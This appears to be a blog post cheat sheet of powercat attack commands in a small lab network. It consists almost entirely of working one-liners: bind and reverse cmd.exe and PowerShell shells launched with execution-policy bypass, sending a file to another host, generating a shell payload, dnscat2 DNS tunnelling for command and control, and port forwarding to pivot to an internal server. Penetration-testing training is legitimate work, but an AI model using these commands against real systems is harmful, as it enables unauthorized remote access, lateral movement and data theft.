Hacktool series: powercat

Common powercat scenarios

Simple network layout

kali: 192.168.0.128

win7: 192.168.0.137, 10.10.10.131

winserver2008: 10.10.10.171

Bind (forward) connection to the target

Target machine: win7

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\al\Desktop\powercat-master\powercat.ps1;Powercat -l -p 8080 -e cmd.exe -v}"

Attacker: kali

nc 192.168.0.137 8080 -vv

Reverse connection to the target

Attacker: kali

nc -l -p 8080 -vv

Target machine: win7

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\al\Desktop\powercat-master\powercat.ps1;powercat -c 192.168.0.128 -p 8080 -v -e cmd.exe}"

Reverse connection that returns a PowerShell session

win7

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\al\Desktop\powercat-master\powercat.ps1;powercat -l -p 8080 -v}"

winserver 2008

powershell.exe -exec bypass -Command "& {Import-Module C:\powercat-master\powercat.ps1;powercat -c 10.10.10.131 -p 8080 -v -ep}"

File transfer

win7

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\al\Desktop\powercat-master\powercat.ps1;powercat -l -p 8080 -of C:\Users\al\Desktop\flag.txt -v}"

winserver 2008

powershell.exe -exec bypass -Command "& {Import-Module C:\powercat-master\powercat.ps1;powercat -c 10.10.10.131 -p 8080 -i C:\flag.txt -v}"

Generating a payload

win7

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\al\Desktop\powercat-master\powercat.ps1;powercat -l -p 8080 -e cmd -v -g >> shell.ps1}"

winserver 2008

powershell.exe -exec bypass -Command ".\shell.ps1"

win7

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\al\Desktop\powercat-master\powercat.ps1;powercat -c 10.10.10.171 -p 8080 -v}"

DNS protocol (DNSCAT)

kali

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
gem install bundler
bundle install

kali

ruby dnscat2.rb test.com -e open

win7

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\al\Desktop\powercat-master\powercat.ps1;powercat -c 192.168.0.128 -p 53 -dns test.com -e cmd.exe -v}"

kali (change the number after -i to match the session that was actually established)

session -i 1

Port forwarding

winserver 2008

powershell.exe -exec bypass -Command "& {Import-Module C:\powercat-master\powercat.ps1;powercat -l -v -p 9999 -e cmd.exe}"

win7

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\al\Desktop\powercat-master\powercat.ps1;powercat -l -v -p 8000 -r tcp:10.10.10.171:9999}"

kali

nc 192.168.0.137 8000 -vv

Port forwarding over DNS

kali

ruby dnscat2.rb test.com -e open

win7

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\al\Desktop\powercat-master\powercat.ps1;powercat -l -v -p 8080 -r dns:192.168.0.128::test.com}"

winserver2008

powershell.exe -exec bypass -Command "& {Import-Module C:\powercat-master\powercat.ps1;powercat -c 10.10.10.131 -p 8080 -e cmd.exe -v}"
posted @ 2022-01-11 14:48 墨宸